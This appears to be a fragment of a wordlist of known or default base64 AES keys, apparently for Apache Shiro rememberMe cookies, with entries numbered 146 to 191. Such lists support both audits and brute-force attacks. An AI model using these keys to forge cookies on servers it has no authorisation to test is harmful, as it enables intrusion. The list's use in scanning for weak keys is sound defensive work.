146 | 3qDVdLawoIr1xFd6ietnsg==
147 | 2AvVhdsgUsOFSA3SDFAdag==
148 | FP7qKJzdJOGkzoQzo2wTmA==
149 | wyLZMDifwq3sW1vhhHpgKA==
150 | 5AvVhCsgUs0FSA3SDFAdag==
151 | pbnA+Qzen1vjV3rNqQBLHg==
152 | GhrF5zLfq1Dtadd1jlohhA==
153 | 2AvVhmFLUs0KTA3Kprsdag==
154 | mIccZhQt6EBHrZIyw1FAXQ==
155 | 4AvVhmFLUs0KTA3Kprseaf==
156 | GHxH6G3LFh8Zb3NwoRgfFA==
157 | B9rPF8FHhxKJZ9k63ik7kQ==
158 | 3AvVhmFLUs0KTA3KaTHGFg==
159 | M2djA70UBBUPDibGZBRvrA==
160 | QDFCnfkLUs0KTA3Kprsdag==
161 | 2adsfasdqerqerqewradsf==
162 | 3Av2hmFLAs0BTA3Kprsd6E==
163 | 4AvVhmFLUsOKTA3Kprsdag==
164 | Z3VucwACAOVAKALACAADSA==
165 | 4AvVhmFLUs0KTA3KAAAAAA==
166 | sBv2t3okbdm3U0r2EVcSzB==
167 | 5oiR5piv5p2h5ZK46bG8IQ==
168 | TGMPe7lGO/Gbr38QiJu1/w==
169 | 4AvVhmFLUs0TTA3Kprsdag==
170 | YWdlbnRAZG1AMjAxOHN3Zg==
171 | Z3VucwAAAAAAAAAAAAABBB==
172 | AztiX2RUqhc7dhOzl1Mj8Q==
173 | FjbNm1avvGmWE9CY2HqV75==
174 | QVN1bm5uJ3MgU3Vuc2l0ZQ==
175 | 9Ami6v2G5Y+r5aPnE4OlBB==
176 | 2AvVidsaUSofSA3SDFAdog==
177 | 3AvVhdAgUs1FSA4SDFAdBg==
178 | R29yZG9uV2ViAAAAAAAAAA==
179 | wrjUh2ttBPQLnT4JVhriug==
180 | w793pPq5ZVBKkj8OhV4KaQ==
181 | c2hvdWtlLXBsdXMuMjAxNg==
182 | pyyX1c5x2f0LZZ7VKZXjKO==
183 | duhfin37x6chw29jsne45m==
184 | QUxQSEFNWVNPRlRCVUlMRA==
185 | YVd4dmRtVjViM1UlM0QIdn==
186 | YnlhdnMAAAAAAAAAAAAAAA==
187 | YystomRZLMUjiK0Q1+LFdw==
188 | fCq+/xW488hMTCE+cmJ3FF==
189 | 2AvVhdsgUs0FSA3SDFAder==
190 | A+kWR7o9O0/G/W6aOGesRA==
191 | sgIQrqUVxa1OZRRIK3hLZw==


--------------------------------------------------------------------------------